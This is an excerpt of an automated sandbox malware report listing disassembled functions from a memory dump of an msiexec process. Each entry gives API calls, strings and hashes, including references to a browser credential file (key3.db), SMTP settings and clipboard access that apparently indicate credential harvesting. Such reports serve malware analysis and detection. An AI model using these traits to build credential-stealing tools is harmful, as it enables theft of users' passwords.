                                                                                        • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                        • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                        Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: H
                                                                                        • API String ID: 2221118986-2852464175
                                                                                        • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                        • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                        • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                        • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                        Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                        • API String ID: 3510742995-3170954634
                                                                                        • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                        • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                        • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                        • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                        Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                        • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$memcpy
                                                                                        • String ID: @ $SQLite format 3
                                                                                        • API String ID: 231171946-3708268960
                                                                                        • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                        • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                        • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                        • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                        Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: winWrite1$winWrite2
                                                                                        • API String ID: 438689982-3457389245
                                                                                        • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                        • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                        • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                        • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                        Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: winRead
                                                                                        • API String ID: 1297977491-2759563040
                                                                                        • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                        • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                        • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                        • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                        Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0044955B
                                                                                        • memset.MSVCRT ref: 0044956B
                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: gj
                                                                                        • API String ID: 1297977491-4203073231
                                                                                        • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                        • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                        • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                        • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                        Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                        • memset.MSVCRT ref: 0040AB9C
                                                                                          • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                          • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                          • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                        • sprintf.MSVCRT ref: 0040ABE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                        • API String ID: 3337535707-2769808009
                                                                                        • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                        • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                        • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                        • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                        Function 0040C143 Relevance: 7.6, APIs: 5, Instructions: 54clipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                        • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                        • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                        • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1189762176-0
                                                                                        • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                        • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                        • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                        • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                        Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 004090C2
                                                                                        • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                        • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                        • String ID:
                                                                                        • API String ID: 4247780290-0
                                                                                        • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                        • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                        • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                        • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                        Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                          • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                          • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                          • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                          • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                          • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                          • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                        • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                        • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                        • String ID:
                                                                                        • API String ID: 2374668499-0
                                                                                        • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                        • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                        • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                        • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                        Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                        • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                        • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                        • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                        Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                        • free.MSVCRT ref: 00409B00
                                                                                          • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@$free
                                                                                        • String ID:
                                                                                        • API String ID: 2241099983-0
                                                                                        • Opcode ID: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                                        • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                        • Opcode Fuzzy Hash: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                                        • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                        Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                          • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                          • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                        • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                        • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                        • String ID:
                                                                                        • API String ID: 2775283111-0
                                                                                        • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                        • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                        • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                        • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                        Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                        • API String ID: 885266447-2471937615
                                                                                        • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                        • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                        • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                        • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                        Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                        • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                          • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                          • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$??2@??3@CloseHandleReadSize
                                                                                        • String ID: Ul@$key3.db
                                                                                        • API String ID: 3013762397-1563549157
                                                                                        • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                        • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                        • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                        • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                        Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _strcmpi.MSVCRT ref: 0040E134
                                                                                        • _strcmpi.MSVCRT ref: 0040E14D
                                                                                        • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strcmpi$_mbscpy
                                                                                        • String ID: smtp
                                                                                        • API String ID: 2625860049-60245459
                                                                                        • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                        • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                        • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                        • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                        Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C28C
                                                                                        • SetFocus.USER32(?,?), ref: 0040C314
                                                                                          • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FocusMessagePostmemset
                                                                                        • String ID: S_@$l
                                                                                        • API String ID: 3436799508-4018740455
                                                                                        • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                        • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                        • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                        • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                        Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004092C0
                                                                                        • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                        Strings
                                                                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString_mbscpymemset
                                                                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                        • API String ID: 408644273-3424043681
                                                                                        • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                        • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                        • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                        • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                        Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscpy
                                                                                        • String ID: C^@$X$ini
                                                                                        • API String ID: 714388716-917056472
                                                                                        • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                        • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                        • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                        • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                        Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                          • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                        • String ID: MS Sans Serif
                                                                                        • API String ID: 3492281209-168460110
                                                                                        • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                        • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                        • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                        • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                        Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                        Download Yara Rule
